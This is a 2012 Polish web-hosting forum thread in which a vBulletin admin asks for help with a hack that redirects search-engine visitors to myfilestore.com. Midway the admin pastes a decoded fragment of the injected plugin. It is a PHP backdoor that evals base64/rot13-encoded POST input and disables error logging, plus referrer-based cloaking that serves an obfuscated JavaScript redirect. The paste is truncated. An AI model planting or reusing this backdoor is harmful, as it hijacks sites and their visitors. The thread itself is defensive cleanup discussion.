wirus vbulletin (proszę o pomoc)

[kuba.3477 0]

Cześć,

 

mam taki dziwny problem na forum vbulletin (3.8.7). Dzisiaj szukałem czegoś w google i wszedłem na moje forum przez link w wynikach wyszukiwania google. Co ciekawe zamiast forum w pasku pojawił się adres: myfilestore.com

 

Przeczytałem już wszystko w sieci na ten temat, jednak nic nie pomaga. Admin mojego dedyka również wszystko sprawdził i wydaje się nie być problemu z serwerem. Ma ktoś jakiś pomysł?

 

PS: Dodam jako ciekawostkę, że identyczny komunikat dostałem dzisiaj wchodząc na peb (również przez google).

Edytowano Luty 28, 2012 przez kuba.3477 (zobacz historię edycji)

[root.ie 0]

Sugerując się tą ciekawostką, proponuję przeskanować swój system.

Edytowano Luty 28, 2012 przez root.ie (zobacz historię edycji)

[kuba.3477 0]

Problem na 100% nie leży w moim systemie.

[Gość AceDude]

.htaccess

[kuba.3477 0]

Sprawdzony, wszystko jest dobrze.

 

Chodzi o coś takiego, fotka z neta...

 

[root.ie 0]

Tu masz odpowiedź: https://www.vbulletin.com/forum/showthread.php/380708-Google-Re-Direct-clicks-to-my-forum-to-MyFileStore-com

[kuba.3477 0]

Problem jednak w tym, że serwer został dokładnie sprawdzony i te sugestie nie pomagają w rozwiązaniu problemu.

[xorg 693]

Masz doklejny gdzieś kod javascript który wykonuje się z apomcą unescape - przejrzyj pliki na ftp i szablony w bazie danych.

[kuba.3477 0]

Niestety nic nie pomaga, dzisiaj po 24h znowu pojawiło się przekierowanie. Tak samo na peb i na hdtv.com.pl/forum

Edytowano Luty 29, 2012 przez kuba.3477 (zobacz historię edycji)

[tym 205]

To kogoś zatrudnij bo widać że nie ogarniasz tematu...

[kuba.3477 0]

No właśnie działa najlepszy admin z wht i nie możemy nic znaleźć. Myślałem, że może ktoś z Was miał podobny problem i może coś doradzić.

[xorg 693]

Napisz do mnie na gg, na 99% nie będzie jakoś strasznie ciężkie to http://www.webhostingtalk.pl//public/style_emoticons/#EMO_DIR#/wink.png

Edytowano Styczeń 25, 2013 przez xorg (zobacz historię edycji)

[kuba.3477 0]

Cześć,

 

coś takiego znaleźliśmy (rozkodowany fragment) w baza forum -> tabela datastore -> wpis plugins

 

if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x);
ini_set('display_errors',0);ini_set('log_errors',0);
$r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER');
if(strlen($r)>10)
{
$ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip);
if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false))
{
	$s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com');
	foreach($s as $e)
	{
			if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp'])))
			{
					$h=strtoupper(substr(@md5($_SERVER['HTTP_HOST']),0,8));
					die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVLbctowFPwVmpmOpLFDuBgMcd1MQqBN703avlhqRwgBDmAcYy6J5X/vihQmU9vHZ7V7LvsgvZFzOl

 

Spotkaliście z takim problemem? Może wiecie, jak to wywalić całkowicie?

Edytowano Luty 29, 2012 przez kuba.3477 (zobacz historię edycji)

[xorg 693]

Przejrzyj jeszcze wtyczki.

[devilMedia.pl 26]

To stary bug vB. Wystarczyło wgrać zainfekowanego gif'a jako awatar w którym przerzuciliśmy "bonusowy" kod. Później już z górki. Spójrz na to: http://www.vbseo.com/f77/google-redirecting-filestore123-info-49062/index3.html#post309843